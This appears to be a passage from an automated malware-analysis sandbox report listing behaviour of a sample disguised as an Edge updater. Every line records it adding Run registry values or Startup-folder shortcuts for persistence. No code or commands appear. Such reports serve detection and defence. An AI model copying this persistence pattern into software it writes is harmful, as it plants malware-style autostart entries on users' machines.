Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1d2b613aae554f4592fc7f30a2b8e152	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3824e21cda984d7894707e45b8faf82c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e8b69fc719b4685bc7cffc277dfe9af	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_150d8e672210470a8c9a467c5aed098e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ffca109f527449d586f9ef9fd21fbf20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9cf520f371764b82b857d9cb33c1c1b9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_458ab18eced74f11be18efec97b9136b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1f407ae6ef78497d8ebdc632e5989198	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_076f22289009438ab18e4242d83866f2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_43166ccab6ff4397ac3a2eb590eb1c39	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b8360a04caa34316b914c81ee668c33d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_234ed6d4162f437ab87974985908b663	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_6b650992195e484781a184773079273e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e29572af1d24e07883ef344c29f493a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_cc346c146a7b4c2f8d3f90dfc0881616	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_6b168715a06d408abb81552b537857e5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e97fc65406464d42b5dbe37192c50f35	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e9214a2484f8414d9a3a5068f9f0e390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d2f0fb16033c457184c9a2e0e15ecaf8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ea931cc1ba394a7b98a7cd9d7539c5dd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9401d9de89ec49eb99371a16cc778385	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_14e619b2e0fa48a59da49ba359247862	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b132c1b1115e49aa8d26472508dc6e6a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f6f1c51b990640da92f24a16f0864041	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_33895dbc660f4ee0ba9976b87a46a17a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9ddb7854ccd14bb28f58b9102a370349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_98efe74ccd0f4ea68f4365b9bc9bd20c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e759019a4ca749939a6920d027750753	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93238feb17104835b09e6322da197346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1babeefc1c5c4fcdbce69ef42a91683d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_265da08d02de42c2bf9a8a47f2eb5571	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_cece22613d2248a7941085b25f944fab	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5122e11dbf434a239d78b1a6dde0a34a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_21283dc2f9bf4c4496d8661199da49e1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c5199ead66b642a38d6d176ac78cfcd4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_aa38d90c52324913a8169b02ba548943	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e3d5f095014e421c870e7aeacf01bfb2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_25d83f3da8164df488b647318d0b6cee	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c5d858544ea14a74bac226d74223cc00	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_03f23db4ef514593b1bad53939845e32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2f241ca04adf4b179664f4d095e294f8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_71ad754cd48448efbfb0280c55aafcfc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_dbd5e1c384bd40a98a7962069001d3aa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_02174c662e6842d08b090652311be523	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_39cd9eda854d4bc8889f2c9988559619	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_fef7cb3e6cc445baaa9ae95e30fb6f18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_247b5188c9d74442849f1434b32c1a2d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0df94e9170c04d57a7a0925e759ed050	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c31bcba2058447588bcbb20d3a940a1e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_32fc4a29748343cebf9c0589546cf556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7dbd3793a4a6491e93e0be29b6100c76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2e42a6c9e632472c80b013b90c920c12	Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_9cd4d46bd3c344a5a3b57427edc04e3a.lnk

Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_9cd4d46bd3c344a5a3b57427edc04e3a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e892251fda954bb5b9ddb3d046567a8a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_41b8b9f6092a43418819142050387373.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_340cbc2e44fd4c878aa92e140d64a0f8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_a17d5cfeb5ef442da8c2a20bed8d9d8f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_906d1686ddbf4967b46575de2621d86d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_485d34a5b03c48c7a76fefa3f90426a3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_ff13f93ecae54136a80bee031bd9011e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1fea5c584df64a41b9220675ab62d7f9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2d4ce600d8f14273917139d8018be8d3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_113088e5c96340fe9fe76c1c18993310.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_26308272c30649dda16740d38c231251.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3f8a5e91d5d944b1b88a5ca92635f511.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8e2b9cb806034df8ad8ff6173a35ed5e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8c19d81d27cf49499645d8fde1085e62.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4e89d62b6314802b698f778719c4e41.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2d3e067308c543f995db2c5843e9efb5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_40a8296880184f1397aaa52465a9ca80.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_03e67ecb722e426e86245d879a8c4969.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2b3f065df93c4401905a03aa3de62b5b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2f79f0adcf954e24a21fdda9ce0da31e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fea9c32cf061495787bf3801120df355.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_63069add25714d9da3a8b41cf36ac0a6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cf2ee3df532d40ce84524d91d76ef01d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b798218a8d5c440bb17c1a50108ec71b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_90b3c86715ff47d8811cac966375b65f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f2ea87e99e2943ffad3d0eb01596b467.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b43de8fdaedd43b9afe7708cdd752d2c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_00774d3b45e04f12abc622ce376c40af.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7913b0527f3d4235b6ceb5c4130d80dd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4a40f23d119492b9c36293469b7816f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2dcb319cf8274129a78b921238fe7cb3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_6222ebb440bb43c7b9c768da3af11750.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_6a9254444906492c8c8f284624ca1f37.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_4e640fe239e64907858c8d5be31e6598.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c87d02d482fb4ca596a2fcc5e82e665e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_47e6f15250e14047992326a53b97b7e2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3aae43b4e9a4468ba0c83637938945e1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cd1906435c8a4f349e226615398c886c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_905bba77717b4267976905fa6260424d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d688a1f8ca524c3fb3a2e04be22b53c2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_474eee5cd4b34cb8b74ac6d25e0dfed3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_be6a07612abb41949afd68049a21708e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_711b254958554f49b23c601b912e6740.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8a66772f7aad4e4fae9a833c748bc8a0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b57470c38d394fa8867c44498ed71109.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_29bc430ad8424be3a41e66ed515dc99c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f827da91bc664cdc9ece459a3d1c468a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f36dc9efa98a4e41aa28ba7a861ca173.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fe8e200076cc49cdb8a438b434fa52d9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e9fb1908f1054881b6ffc228f98a913e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_955a0ab24a744d3bba6d4b99fa7724f9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c2ebe0361535455e8788ff8a6bc522ba.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3b0b2fd724544d12b75c23f650bcee90.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_00b9f3e5a01d41f3b6dd1f946a0c3058.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_a70151abc03140619fc377a02390a2ba.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_0d538cad12064978af5a3268dc5d559e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fa81cc20db9049868ae7912824615f1b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_6d32a083e4f54b468efef75cad3ace29.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d3145aa6b3734b18871d6250fe6aa172.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c355178b7b7f40a1947b66c7cd8f0d74.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_225b3b92b5ed431a998b13aa9f182277.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2615dcf28a8f4e5fa5a8ed2977c478b6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e5f04cf0df234c0aab8a48e6f7813fa9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c6015a8a9597483d8296fda05e0c6cea.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_14f5035470644de6885cf4a339dafe4a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f6ba4aa9c38840bcb1dc8c1cd1b1a57d.lnk	Jump to behavior
